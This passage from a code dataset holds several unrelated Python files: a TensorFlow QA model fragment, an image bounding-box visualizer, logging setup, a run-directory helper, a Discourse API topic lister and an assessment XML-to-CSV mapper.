input_keep_prob=keep_prob)\n return cell\n \n def build_feed_dict(self, context, question, y_start, y_end, drop_keep_prob=0.7):\n feed_dict = {\n self.question: question,\n self.context: context,\n self.y_start: y_start,\n self.y_end: y_end,\n self.dropout_keep_prob: drop_keep_prob\n }\n return feed_dict\n \n def train(self, context, question, y1, y2, drop_keep_prob=0.85, record_interval=10):\n feed_dict = {\n self.question: question,\n self.context: context,\n self.y_start: y1,\n self.y_end: y2,\n self.dropout_keep_prob: drop_keep_prob\n }\n if self.global_step % record_interval == 0:\n _, loss, summaries = self.session.run([self.train_op, self.total_loss, self.merge_op], feed_dict=feed_dict)\n self.writer.add_summary(summaries, self.global_step)\n else:\n _, loss = self.session.run([self.train_op, self.total_loss], feed_dict=feed_dict)\n self.global_step += 1\n return loss\n \n def evaluate(self, context, question, y1, y2, drop_keep_prob=1.0):\n feed_dict = {\n self.question: question,\n self.context: context,\n self.y_start: y1,\n self.y_end: y2,\n self.dropout_keep_prob: drop_keep_prob\n }\n loss = self.session.run([self.total_loss], feed_dict=feed_dict)\n summary = tf.Summary()\n summary_value = summary.value.add()\n summary_value.simple_value = loss[0]\n summary_value.tag = 'evaluate_loss'\n self.writer.add_summary(summary, self.global_step)\n return loss\n \n def predict(self, context, question):\n feed_dict = {\n self.question: question,\n self.context: context,\n self.dropout_keep_prob: 1.0\n }\n start, end = self.session.run([self.y_predict_start_index, self.y_predict_end_index], feed_dict=feed_dict)\n return start, end\n \n def load_model(self):\n self.saver.restore(self.session, self.model_path + '/rnnqanet')\n \n def save_model(self, ):\n if not os.path.exists(self.model_path):\n os.mkdir(self.model_path)\n model_file = self.model_path + '/rnnqanet'\n self.saver.save(self.session, model_file)\n","repo_name":"yuriak/QASystem","sub_path":"RNNQANet.py","file_name":"RNNQANet.py","file_ext":"py","file_size_in_byte":14068,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"22553494002","text":"import json, os, sys, cv2\nimport logging\nimport numpy as np\nfrom tqdm import tqdm\nfrom collections import defaultdict\n\ndef make_logger(log):\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n \n # formatter\n file_formatter = logging.Formatter(\"%(asctime)s [%(levelname)s:%(lineno)d] -- %(message)s\")\n # file_handler\n file_handler = logging.FileHandler(log, mode='w')\n file_handler.setFormatter(file_formatter)\n file_handler.setLevel(logging.INFO)\n # logger.add\n logger.addHandler(file_handler)\n \n return logger\n\ndef readfiles(dir, Ext):\n file_dict = defaultdict(str)\n if Ext == 'img':\n for root, dirs, files in os.walk(dir):\n for file in files:\n filename, ext = os.path.splitext(file)\n if ext == '.jpg' or ext == '.jpeg':\n file_path = os.path.join(root, file)\n\n file_dict[filename] = file_path\n elif Ext == 'json':\n for root, dirs, files in os.walk(dir):\n for file in files:\n filename, ext = os.path.splitext(file)\n if ext == '.json':\n file_path = os.path.join(root, file)\n\n file_dict[filename] = file_path\n return file_dict\n\ndef read_img(img_path):\n img_array = np.fromfile(img_path, np.uint8)\n img = cv2.imdecode(img_array, cv2.IMREAD_COLOR)\n return img\n\n_, img_dir, json_dir, output_dir = sys.argv\n\nlogger = make_logger('log.log')\n\nimg_dict = readfiles(img_dir, 'img')\njson_dict = readfiles(json_dir, 'json')\n\nfor filename, img_path in tqdm(img_dict.items()):\n json_path = json_dict[filename]\n \n root, file = os.path.split(img_path)\n mid = '\\\\'.join(root.split('\\\\')[len(img_dir.split('\\\\')):])\n folder= os.path.join(output_dir, mid)\n os.makedirs(folder, exist_ok=True)\n output_img_path = os.path.join(folder, file)\n \n with open(json_path, encoding='UTF-8') as f:\n json_file = json.load(f)\n \n img = read_img(img_path)\n font = cv2.FONT_HERSHEY_PLAIN\n fontScale = 3\n for img_data in json_file['imageDataList']:\n if os.path.splitext(img_data['imageName'])[0] == filename:\n for rect in img_data['rectangleEntries']:\n text = rect['name']\n points = rect['points']\n \n \n text_w, text_h = cv2.getTextSize(text, font, fontScale=fontScale, thickness=3)[0]\n cv2.rectangle(img, (points[0], points[1]), (points[2], points[3]), color=(0, 0, 255), thickness=3)\n cv2.rectangle(img, (points[0], points[1]),(points[0]+text_w, points[1]+text_h), color=(255,255,255), thickness=-1)\n cv2.putText(img, text, (points[0], points[1]+text_h), fontFace=font, fontScale=fontScale, color=(0,0,0), thickness=3)\n \n \n result, encoded_img = cv2.imencode('.jpg', img)\n logger.info(f\"{output_img_path} 저장!!\")\n if result:\n with open(output_img_path, mode='w+b') as f:\n encoded_img.tofile(f)\n \n \n \n ","repo_name":"tkdalsrb123/Alchera","sub_path":"09/0911_tta_bbox_vis/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27223514239","text":"import sys\nimport warnings\n\nfrom loguru import logger\n\n\ndef setup_logging(loglevel='info', stream_sink=sys.stdout):\n from . import runtime_state\n\n if runtime_state.proc_rank != 0:\n logger.disable('veros')\n return\n\n kwargs = {}\n if sys.stdout.isatty():\n kwargs.update(\n colorize=True\n )\n else:\n kwargs.update(\n colorize=False\n )\n\n logger.level('TRACE', color='<dim>')\n logger.level('DEBUG', color='<dim><cyan>')\n logger.level('INFO', color='')\n logger.level('WARNING', color='<yellow>')\n logger.level('ERROR', color='<bold><red>')\n logger.level('CRITICAL', color='<bold><red><WHITE>')\n logger.level('SUCCESS', color='<dim><green>')\n\n config = {\n 'handlers': [\n dict(\n sink=stream_sink,\n level=loglevel.upper(),\n format='<level>{message}</level>',\n **kwargs\n )\n ]\n }\n\n def showwarning(message, cls, source, lineno, *args):\n logger.warning(\n '{warning}: {message} ({source}:{lineno})',\n message=message,\n warning=cls.__name__,\n source=source,\n lineno=lineno\n )\n\n warnings.showwarning = showwarning\n\n logger.enable('veros')\n return logger.configure(**config)\n","repo_name":"cbrockw/ecosys3D","sub_path":"ecosys3D/logs.py","file_name":"logs.py","file_ext":"py","file_size_in_byte":1338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"44352546533","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Jul 31 16:02:54 2013\n\n@author: dan\n\"\"\"\n\nfrom os.path import isdir\nfrom os import rename, makedirs\nfrom datetime import datetime\n\ndef makeNewRunDir():\n \n # =====================================================\n # create a directory for every set defined by red.inp\n # and fill them with their own modified bucky.inp\n # =====================================================\n \n # use the current date & time to mak a directory name:\n # YYMMDD-hhmm (Y:year, M:month, D:day, h:hour, m:minute)\n # --------------------------------------------------------\n curTime = str(datetime.now())\n curDir = ( 'data/' + curTime[ 2: 4] + curTime[ 5: 7] + curTime[ 8:10]\n + '-' + curTime[11:13] + curTime[14:16] )\n \n # if someone submits more than one parameter sweep \n # a minute, a different naming scheme is needed\n # --------------------------------------------------\n altDir = curDir + 'a' # make the 1st alternative dir\n \n if isdir( curDir ): # check existence of curDir \n rename( curDir , altDir ) # rename the old directory \n \n if isdir( altDir ): # check existence of altDir \n for i in range(97,123): # cycle through alphabet (a-z)\n altDir = curDir + chr(i) # get new altDir\n if not isdir( altDir ): # check existence of altDir \n curDir = altDir # make altDir the curDir \n break # stop cycling through alphabet\n \n makedirs( curDir ) # make new directory\n \n return curDir","repo_name":"djsegal/ahab_legacy_","sub_path":"pequod/makeNewRunDir.py","file_name":"makeNewRunDir.py","file_ext":"py","file_size_in_byte":1729,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"17868482342","text":"import os\nimport requests\nimport pprint\n\n# see - https://meta.discourse.org/t/reading-topics-in-a-forum-with-javascript/23042/3\n# for notes on getting topics\n# Main thing is to get categories from sites first, and then enumerate over topics in\n# each category.\n\n# print(os.environ['DISCOURSE_AUTH'])\n# print(os.environ['DISCOURSE_ROOT'])\n# print(os.environ['DISCOURSE_SESS'])\n\n# Check environment cariables are set\n\nif 'DISCOURSE_AUTH' in os.environ:\n uauth=os.environ['DISCOURSE_AUTH']\nelse:\n print('ERROR: Environment variable DISCOURSE_AUTH not found.')\n print('This is value from https://DOMAIN_NAME/admin/api/keys')\n exit()\n\nif 'DISCOURSE_ROOT' in os.environ:\n uroot=os.environ['DISCOURSE_ROOT']\nelse:\n print('ERROR: Environment variable DISCOURSE_ROOT not found.')\n print('This is the domain name of the discourse site e.g. https://DOMAIN_NAME')\n exit()\n\nif 'DISCOURSE_SESS' in os.environ:\n usess=os.environ['DISCOURSE_SESS']\nelse:\n print('ERROR: Environment variable DISCOURSE_SESS not found.')\n print('This is an _t session key from a valid https://DOMAIN_NAME session')\n print('The _t session key is a security \"feature\" for some discourse installs')\n exit()\n\n# Get site info\n\nurl_site_list='https://%s/%s?%s'%(uroot,'site.json',uauth)\ncookies=dict(_t=usess)\n\nr=requests.get(url_site_list,cookies=cookies)\npp = pprint.PrettyPrinter(indent=1)\n# pp.pprint(r.json())\n# exit()\n\n# Iterate over categories from site\nfor c in r.json()['categories']:\n url_category_list='https://%s/c/%d.json?%s'%(uroot,c[\"id\"],uauth)\n rr=requests.get(url_category_list,cookies=cookies)\n tl=rr.json()[\"topic_list\"][\"topics\"]\n\n # Iterate over topic list returned for each category and match ready tag\n for t in tl:\n if 'zeta:launch-ready' in t['tags']:\n print('Ready_topic ', t['id'], t['title'])\n","repo_name":"necyberteam/discourse-tools","sub_path":"christophernhill_tools/get_topics.py","file_name":"get_topics.py","file_ext":"py","file_size_in_byte":1783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33518888953","text":"# (c) 2014 The Regents of the University of California. All rights reserved,\n# subject to the license below.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may not use\n# this file except in compliance with the License. You may obtain a copy of the\n# License at http://www.apache.org/licenses/LICENSE-2.0. Unless required by\n# applicable law or agreed to in writing, software distributed under the License\n# is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n# KIND, either express or implied. See the License for the specific language\n# governing permissions and limitations under the License.\n\n'''\nCreated on Aug 8, 2014\n\n@author: dip\n'''\nfrom smarter_score_batcher.utils.xml_utils import extract_meta_with_fallback_helper, \\\n extract_meta_without_fallback_helper\nimport itertools\nimport json\nfrom smarter_score_batcher.utils.constants import PerformanceMetadataConstants\nfrom smarter_score_batcher.error.exceptions import MetadataException\nfrom edcore.utils.utils import xml_datetime_convert\nimport hashlib\nfrom edauth.security.utils import load_class\nfrom smarter_score_batcher.celery import conf\n\n\nclass XMLMeta:\n '''\n Used for storing and extracting elements from xml\n '''\n def __init__(self, root, xpath, attribute, attribute_to_compare=None):\n self.root = root\n self.path = xpath\n self.attribute = attribute\n self.attribute_to_compare = attribute_to_compare\n\n def get_value(self):\n if self.attribute_to_compare:\n val = extract_meta_with_fallback_helper(self.root, self.path, self.attribute, self.attribute_to_compare)\n else:\n val = extract_meta_without_fallback_helper(self.root, self.path, self.attribute)\n return val\n\n\nclass DateMeta(XMLMeta):\n\n def get_value(self):\n date = super().get_value()\n return xml_datetime_convert(date)\n\n\nclass IntegerMeta(XMLMeta):\n\n def get_value(self):\n data = super().get_value()\n return str(int(data)) if data else data\n\n\nclass HashMeta(XMLMeta):\n '''\n Evaluates the value from XML attribute, and hashes it\n '''\n\n def get_value(self):\n data = super().get_value()\n return hashlib.sha1(data.encode(\"utf-8\")).hexdigest()\n\n\nclass YesNoMeta(XMLMeta):\n\n def get_value(self):\n result = None\n data = super().get_value()\n if data and data is not None:\n if data.lower() == \"yes\":\n result = \"Yes\"\n elif data.lower() == \"no\":\n result = \"No\"\n return result\n\n\nclass ValueMeta():\n\n def __init__(self, value):\n self.value = value\n\n def get_value(self):\n return self.value\n\n\nclass XMLClaimScore:\n '''\n Accommodation Specific - Perhaps to handle default values\n '''\n def __init__(self, root, xpath, scaleScore_attribute, standardError_attribute):\n self.__scaleScore = XMLMeta(root, xpath, scaleScore_attribute)\n self.__standardError = XMLMeta(root, xpath, standardError_attribute)\n self.__value_scaleScore = self.__scaleScore.get_value()\n self.__value_standardError = self.__standardError.get_value()\n\n def get_max(self):\n meta = XMLClaimScore.XMLClaimScoreMeta(str(int(float(self.__value_scaleScore if self.__value_scaleScore is not None else 0)) + int(float(self.__value_standardError if self.__value_standardError is not None else 0))))\n return meta\n\n def get_min(self):\n meta = XMLClaimScore.XMLClaimScoreMeta(str(int(float(self.__value_scaleScore if self.__value_scaleScore is not None else 0)) - int(float(self.__value_standardError if self.__value_standardError is not None else 0))))\n return meta\n\n class XMLClaimScoreMeta():\n def __init__(self, value):\n self.__value = value\n\n def get_value(self):\n return self.__value\n\n\nclass Mapping:\n '''\n Used for storing and evaluating mapping from xml to csv\n '''\n def __init__(self, src, target):\n self.src = src\n self.target = target\n\n def evaluate(self):\n return self.src.get_value()\n\n\nclass AssessmentHeaders:\n '''\n Constants for assessment csv landing zone file\n '''\n # In the order of csv headers\n StateAbbreviation = 'StateAbbreviation'\n ResponsibleDistrictIdentifier = 'ResponsibleDistrictIdentifier'\n OrganizationName = 'OrganizationName'\n ResponsibleSchoolIdentifier = 'ResponsibleSchoolIdentifier'\n NameOfInstitution = 'NameOfInstitution'\n StudentIdentifier = 'StudentIdentifier'\n ExternalSSID = 'ExternalSSID'\n FirstName = 'FirstName'\n MiddleName = 'MiddleName'\n LastOrSurname = 'LastOrSurname'\n Sex = 'Sex'\n Birthdate = 'Birthdate'\n GradeLevelWhenAssessed = 'GradeLevelWhenAssessed'\n HispanicOrLatinoEthnicity = 'HispanicOrLatinoEthnicity'\n AmericanIndianOrAlaskaNative = 'AmericanIndianOrAlaskaNative'\n Asian = 'Asian'\n BlackOrAfricanAmerican = 'BlackOrAfricanAmerican'\n NativeHawaiianOrOtherPacificIslander = 'NativeHawaiianOrOtherPacificIslander'\n White = 'White'\n DemographicRaceTwoOrMoreRaces = 'DemographicRaceTwoOrMoreRaces'\n IDEAIndicator = 'IDEAIndicator'\n LEPStatus = 'LEPStatus'\n Section504Status = 'Section504Status'\n EconomicDisadvantageStatus = 'EconomicDisadvantageStatus'\n MigrantStatus = 'MigrantStatus'\n Group1Id = 'Group1Id'\n Group1Text = 'Group1Text'\n Group2Id = 'Group2Id'\n Group2Text = 'Group2Text'\n Group3Id = 'Group3Id'\n Group3Text = 'Group3Text'\n Group4Id = 'Group4Id'\n Group4Text = 'Group4Text'\n Group5Id = 'Group5Id'\n Group5Text = 'Group5Text'\n Group6Id = 'Group6Id'\n Group6Text = 'Group6Text'\n Group7Id = 'Group7Id'\n Group7Text = 'Group7Text'\n Group8Id = 'Group8Id'\n Group8Text = 'Group8Text'\n Group9Id = 'Group9Id'\n Group9Text = 'Group9Text'\n Group10Id = 'Group10Id'\n Group10Text = 'Group10Text'\n AssessmentGuid = 'AssessmentGuid'\n AssessmentSessionLocationId = 'AssessmentSessionLocationId'\n AssessmentSessionLocation = 'AssessmentSessionLocation'\n AssessmentAdministrationFinishDate = 'AssessmentAdministrationFinishDate'\n AssessmentYear = 'AssessmentYear'\n AssessmentType = 'AssessmentType'\n AssessmentAcademicSubject = 'AssessmentAcademicSubject'\n AssessmentLevelForWhichDesigned = 'AssessmentLevelForWhichDesigned'\n AssessmentSubtestResultScoreValue = 'AssessmentSubtestResultScoreValue'\n AssessmentSubtestMinimumValue = 'AssessmentSubtestMinimumValue'\n AssessmentSubtestMaximumValue = 'AssessmentSubtestMaximumValue'\n AssessmentPerformanceLevelIdentifier = 'AssessmentPerformanceLevelIdentifier'\n AssessmentSubtestResultScoreClaim1Value = 'AssessmentSubtestResultScoreClaim1Value'\n AssessmentSubtestClaim1MinimumValue = 'AssessmentSubtestClaim1MinimumValue'\n AssessmentSubtestClaim1MaximumValue = 'AssessmentSubtestClaim1MaximumValue'\n AssessmentClaim1PerformanceLevelIdentifier = 'AssessmentClaim1PerformanceLevelIdentifier'\n AssessmentSubtestResultScoreClaim2Value = 'AssessmentSubtestResultScoreClaim2Value'\n AssessmentSubtestClaim2MinimumValue = 'AssessmentSubtestClaim2MinimumValue'\n AssessmentSubtestClaim2MaximumValue = 'AssessmentSubtestClaim2MaximumValue'\n AssessmentClaim2PerformanceLevelIdentifier = 'AssessmentClaim2PerformanceLevelIdentifier'\n AssessmentSubtestResultScoreClaim3Value = 'AssessmentSubtestResultScoreClaim3Value'\n AssessmentSubtestClaim3MinimumValue = 'AssessmentSubtestClaim3MinimumValue'\n AssessmentSubtestClaim3MaximumValue = 'AssessmentSubtestClaim3MaximumValue'\n AssessmentClaim3PerformanceLevelIdentifier = 'AssessmentClaim3PerformanceLevelIdentifier'\n AssessmentSubtestResultScoreClaim4Value = 'AssessmentSubtestResultScoreClaim4Value'\n AssessmentSubtestClaim4MinimumValue = 'AssessmentSubtestClaim4MinimumValue'\n AssessmentSubtestClaim4MaximumValue = 'AssessmentSubtestClaim4MaximumValue'\n AssessmentClaim4PerformanceLevelIdentifier = 'AssessmentClaim4PerformanceLevelIdentifier'\n AccommodationAmericanSignLanguage = 'AccommodationAmericanSignLanguage'\n AccommodationBraille = 'AccommodationBraille'\n AccommodationClosedCaptioning = 'AccommodationClosedCaptioning'\n AccommodationTextToSpeech = 'AccommodationTextToSpeech'\n AccommodationAbacus = 'AccommodationAbacus'\n AccommodationAlternateResponseOptions = 'AccommodationAlternateResponseOptions'\n AccommodationCalculator = 'AccommodationCalculator'\n AccommodationMultiplicationTable = 'AccommodationMultiplicationTable'\n AccommodationPrintOnDemand = 'AccommodationPrintOnDemand'\n AccommodationPrintOnDemandItems = 'AccommodationPrintOnDemandItems'\n AccommodationReadAloud = 'AccommodationReadAloud'\n AccommodationScribe = 'AccommodationScribe'\n AccommodationSpeechToText = 'AccommodationSpeechToText'\n AccommodationStreamlineMode = 'AccommodationStreamlineMode'\n AccommodationNoiseBuffer = 'AccommodationNoiseBuffer'\n AdministrationCondition = 'AdministrationCondition'\n CompleteStatus = 'CompleteStatus'\n\n\nclass AssessmentData:\n def __init__(self, *mappings):\n self.__mappings = itertools.chain(*mappings)\n self.__header = []\n self.__values = []\n\n def add(self, header, value):\n self.__header.append(header)\n self.__values.append(value)\n\n @property\n def header(self):\n return self.__header\n\n @property\n def values(self):\n return self.__values\n\n def evaluate(self):\n for m in self.__mappings:\n # Save the CSV Header, and Value Extracted from XML\n self.add(m.target, m.evaluate())\n\n\ndef getClaimMappingName(metadata, claim_name, default_value):\n '''\n get mapping name for claims\n '''\n mapping = default_value\n if metadata is not None:\n claims = metadata.get(PerformanceMetadataConstants.CLAIMS)\n if claims is not None:\n claim = claims.get(claim_name)\n if claim is not None:\n mapping = claim.get(PerformanceMetadataConstants.MAPPING, default_value)\n return mapping\n\n\ndef get_assessment_mapping(root, metadata):\n '''\n Returns state code and the landing zone format of assessment csv file\n '''\n examinee = root.find(\"./Examinee\")\n opportunity = root.find(\"./Opportunity\")\n test_node = root.find(\"./Test\")\n\n groups = get_groups(examinee)\n accommodations = get_accommodations(opportunity)\n claims = get_claims(metadata, opportunity)\n\n asmt_type = extract_meta_without_fallback_helper(root, \"./Test\", \"assessmentType\")\n subject = extract_meta_without_fallback_helper(root, \"./Test\", \"subject\")\n grade = extract_meta_without_fallback_helper(root, \"./Test\", \"grade\")\n asmt_id = extract_meta_without_fallback_helper(root, \"./Test\", \"testId\")\n academic_year = extract_meta_without_fallback_helper(root, \"./Test\", \"academicYear\")\n effective_date = extract_meta_without_fallback_helper(root, \"./Opportunity\", \"dateCompleted\")\n completeStatus = extract_meta_without_fallback_helper(root, \"./Opportunity\", \"completeStatus\")\n administrationCondition = extract_meta_without_fallback_helper(root, \"./Opportunity\", \"administrationCondition\")\n meta_class = load_class(conf.get('smarter_score_batcher.class.meta', 'smarter_score_batcher.utils.meta.Meta'))\n meta = meta_class(True, '', '', '', academic_year, asmt_type, subject, grade, effective_date, asmt_id)\n stateCode = XMLMeta(examinee, \"./ExamineeRelationship/[@name='StateAbbreviation']\", \"value\", \"context\")\n # In the order of the LZ mapping for easier maintenance\n mappings = AssessmentData([Mapping(stateCode, AssessmentHeaders.StateAbbreviation),\n Mapping(XMLMeta(examinee, \"./ExamineeRelationship/[@name='ResponsibleDistrictIdentifier']\", \"value\", \"context\"), AssessmentHeaders.ResponsibleDistrictIdentifier),\n Mapping(XMLMeta(examinee, \"./ExamineeRelationship/[@name='OrganizationName']\", \"value\", \"context\"), AssessmentHeaders.OrganizationName),\n Mapping(XMLMeta(examinee, \"./ExamineeRelationship/[@name='ResponsibleInstitutionIdentifier']\", \"value\", \"context\"), AssessmentHeaders.ResponsibleSchoolIdentifier),\n Mapping(XMLMeta(examinee, \"./ExamineeRelationship/[@name='NameOfInstitution']\", \"value\", \"context\"), AssessmentHeaders.NameOfInstitution),\n Mapping(XMLMeta(examinee, \"./ExamineeAttribute/[@name='StudentIdentifier']\", \"value\", \"context\"), AssessmentHeaders.StudentIdentifier),\n Mapping(XMLMeta(examinee, \"./ExamineeAttribute/[@name='AlternateSSID']\", \"value\", \"context\"), AssessmentHeaders.ExternalSSID),\n Mapping(XMLMeta(examinee, \"./ExamineeAttribute/[@name='FirstName']\", \"value\", \"context\"), AssessmentHeaders.FirstName),\n Mapping(XMLMeta(examinee, \"./ExamineeAttribute/[@name='MiddleName']\", \"value\", \"context\"), AssessmentHeaders.MiddleName),\n Mapping(XMLMeta(examinee, \"./ExamineeAttribute/[@name='LastOrSurname']\", \"value\", \"context\"), AssessmentHeaders.LastOrSurname),\n Mapping(XMLMeta(examinee, \"./ExamineeAttribute/[@name='Sex']\", \"value\", \"context\"), AssessmentHeaders.Sex),\n Mapping(DateMeta(examinee, \"./ExamineeAttribute/[@name='Birthdate']\", \"value\", \"context\"), AssessmentHeaders.Birthdate),\n Mapping(IntegerMeta(examinee, \"./ExamineeAttribute/[@name='GradeLevelWhenAssessed']\", \"value\", \"context\"), AssessmentHeaders.GradeLevelWhenAssessed),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='HispanicOrLatinoEthnicity']\", \"value\", \"context\"), AssessmentHeaders.HispanicOrLatinoEthnicity),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='AmericanIndianOrAlaskaNative']\", \"value\", \"context\"), AssessmentHeaders.AmericanIndianOrAlaskaNative),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='Asian']\", \"value\", \"context\"), AssessmentHeaders.Asian),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='BlackOrAfricanAmerican']\", \"value\", \"context\"), AssessmentHeaders.BlackOrAfricanAmerican),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='NativeHawaiianOrOtherPacificIslander']\", \"value\", \"context\"), AssessmentHeaders.NativeHawaiianOrOtherPacificIslander),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='White']\", \"value\", \"context\"), AssessmentHeaders.White),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='DemographicRaceTwoOrMoreRaces']\", \"value\", \"context\"), AssessmentHeaders.DemographicRaceTwoOrMoreRaces),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='IDEAIndicator']\", \"value\", \"context\"), AssessmentHeaders.IDEAIndicator),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='LEPStatus']\", \"value\", \"context\"), AssessmentHeaders.LEPStatus),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='Section504Status']\", \"value\", \"context\"), AssessmentHeaders.Section504Status),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='EconomicDisadvantageStatus']\", \"value\", \"context\"), AssessmentHeaders.EconomicDisadvantageStatus),\n Mapping(YesNoMeta(examinee, \"./ExamineeAttribute/[@name='MigrantStatus']\", \"value\", \"context\"), AssessmentHeaders.MigrantStatus),\n\n Mapping(ValueMeta(meta.asmt_id), AssessmentHeaders.AssessmentGuid),\n Mapping(XMLMeta(opportunity, \".\", \"oppId\"), AssessmentHeaders.AssessmentSessionLocationId),\n Mapping(XMLMeta(opportunity, \".\", \"server\"), AssessmentHeaders.AssessmentSessionLocation),\n Mapping(ValueMeta(meta.effective_date), AssessmentHeaders.AssessmentAdministrationFinishDate),\n Mapping(ValueMeta(meta.academic_year), AssessmentHeaders.AssessmentYear),\n Mapping(ValueMeta(meta.asmt_type), AssessmentHeaders.AssessmentType),\n Mapping(ValueMeta(meta.subject), AssessmentHeaders.AssessmentAcademicSubject),\n Mapping(ValueMeta(administrationCondition), AssessmentHeaders.AdministrationCondition),\n Mapping(ValueMeta(completeStatus), AssessmentHeaders.CompleteStatus),\n Mapping(ValueMeta(meta.grade), AssessmentHeaders.AssessmentLevelForWhichDesigned)],\n claims, groups, accommodations)\n mappings.evaluate()\n return stateCode.get_value(), mappings\n\n\ndef get_groups(examinee):\n '''\n Get groupings from XML <ExamineeRelationship> elements.\n Assign element of list of group to group1, group2, .., group10 according to its order in the list\n\n map element with attribute 'StudentGroupName' to groups based on their order displaying in XML\n only display first 10 groups\n '''\n TOTAL_GROUPS = 10\n mappings = []\n groups = examinee.findall(\"./ExamineeRelationship[@name='StudentGroupName']\")[:TOTAL_GROUPS]\n for i in range(TOTAL_GROUPS):\n if i < len(groups):\n meta = XMLMeta(groups[i], '.', 'value')\n group_id = HashMeta(groups[i], '.', 'value')\n else:\n meta = ValueMeta('')\n group_id = ValueMeta('')\n\n mappings.append(Mapping(group_id, 'Group%dId' % (i + 1)))\n mappings.append(Mapping(meta, 'Group%dText' % (i + 1)))\n return mappings\n\n\nACCOMMODATION_CONFIGS = [\n {'type': 'AmericanSignLanguage', 'target': AssessmentHeaders.AccommodationAmericanSignLanguage},\n {'type': 'ClosedCaptioning', 'target': AssessmentHeaders.AccommodationClosedCaptioning},\n {'type': 'Language', 'target': AssessmentHeaders.AccommodationBraille},\n {'type': 'TextToSpeech', 'target': AssessmentHeaders.AccommodationTextToSpeech},\n {'type': 'StreamlinedInterface', 'target': AssessmentHeaders.AccommodationStreamlineMode},\n {'type': 'PrintOnDemand', 'code': 'TDS_PoD0', 'target': AssessmentHeaders.AccommodationPrintOnDemand},\n {'type': 'PrintOnDemand', 'code': 'TDS_PoD_Stim&TDS_PoD_Item', 'target': AssessmentHeaders.AccommodationPrintOnDemandItems},\n {'type': 'NonEmbeddedAccommodations', 'code': 'NEA_Abacus', 'target': AssessmentHeaders.AccommodationAbacus},\n {'type': 'NonEmbeddedAccommodations', 'code': 'NEA_AR', 'target': AssessmentHeaders.AccommodationAlternateResponseOptions},\n {'type': 'NonEmbeddedAccommodations', 'code': 'NEA_RA_Stimuli', 'target': AssessmentHeaders.AccommodationReadAloud},\n {'type': 'NonEmbeddedAccommodations', 'code': 'NEA_Calc', 'target': AssessmentHeaders.AccommodationCalculator},\n {'type': 'NonEmbeddedAccommodations', 'code': 'NEA_MT', 'target': AssessmentHeaders.AccommodationMultiplicationTable},\n {'type': 'NonEmbeddedAccommodations', 'code': 'NEA_SC_Writitems', 'target': AssessmentHeaders.AccommodationScribe},\n {'type': 'NonEmbeddedAccommodations', 'code': 'NEA_STT', 'target': AssessmentHeaders.AccommodationSpeechToText},\n {'type': 'NonEmbeddedAccommodations', 'code': 'NEA_NoiseBuf', 'target': AssessmentHeaders.AccommodationNoiseBuffer}]\n\n\ndef get_accommodations(opportunity):\n '''\n Get accommodations from XML.\n\n We have two categories of accommodations: Embbed and NonEmbbedded\n\n Embbed accommodations include AmericanSignLanguage, ClosedCaptioning, Language, TextToSpeech, StreamlinedInterface, PrintOnDemand(PrintOnDemand + TDS_PoD0), PrintOnDemandItem(PrintOnDemand + TDS_PoD_Stim&TDS_PoD_Item). If any of the above accommodations appears in XML with `context` of value 'FINAL', we look up use code in element <Score measureLabel=\"Accommodation\"/> according to corresponding accommodation type, otherwise use 0 as fallback use code\n\n Non-Embbed accommodations include Abacus, AlternativeResponse, Calculator, MultiplicationTable, ReadAloud, Scribe, SpeechToText, NoiseBuffer. Each of the above corresponds to a unique code, as in <Accommodation /> 'code' attribute, respectively: NEA_Abacus, NEA_AR, NEA_Calc, NEA_MT, NEA_RA_Stimuli, NEA_SC_WritItems, NEA_STT, NEA_NoiseBuf.\n We look up below element for use code and assign to all Non-Embbed accommodation that show in XML.\n <Score measureOf=\"NonEmbeddedAccommodations\" measureLabel=\"Accommodation\" value=\"6\" />\n All presented Non-Embbed Accommodations will have the same use code, otherwise use 0 as fallback use code\n However, there's a special Non-Embbed code 'NEA0', which is mutually exclusive with the others. In case of its presence, all Non-Embbed accommodations should be assigned with value 0 in database.\n '''\n USE_CODE_NO_ACCESS = '4'\n USE_CODE_NO_MESSAGE = '0'\n\n def _format_XPath(config):\n score_xpath = \"./Score/[@measureOf='%s'][@measureLabel='Accommodation']\" % config['type']\n acc_xpath = \"./Accommodation/[@type='%s'][@context='FINAL']\" % config['type']\n if 'code' in config:\n acc_xpath += \"[@code='%s']\" % config['code']\n return acc_xpath, score_xpath\n\n def _has_NEA0(opportunity):\n acc_xpath, _ = _format_XPath({'type': 'NonEmbeddedAccommodations', 'code': 'NEA0'})\n return opportunity.find(acc_xpath) is not None\n\n def _is_non_embbed(config):\n return config['type'] == 'NonEmbeddedAccommodations'\n\n accommodations = []\n hasNEA0 = _has_NEA0(opportunity)\n for config in ACCOMMODATION_CONFIGS:\n if _is_non_embbed(config) and hasNEA0:\n use_code = USE_CODE_NO_ACCESS\n else:\n acc_xpath, score_xpath = _format_XPath(config)\n score = opportunity.find(score_xpath) if opportunity.find(acc_xpath) is not None else None\n use_code = score.get('value') if score is not None else USE_CODE_NO_MESSAGE\n accommodations.append(Mapping(ValueMeta(use_code), config['target']))\n return accommodations\n\n\ndef get_claims(metadata, 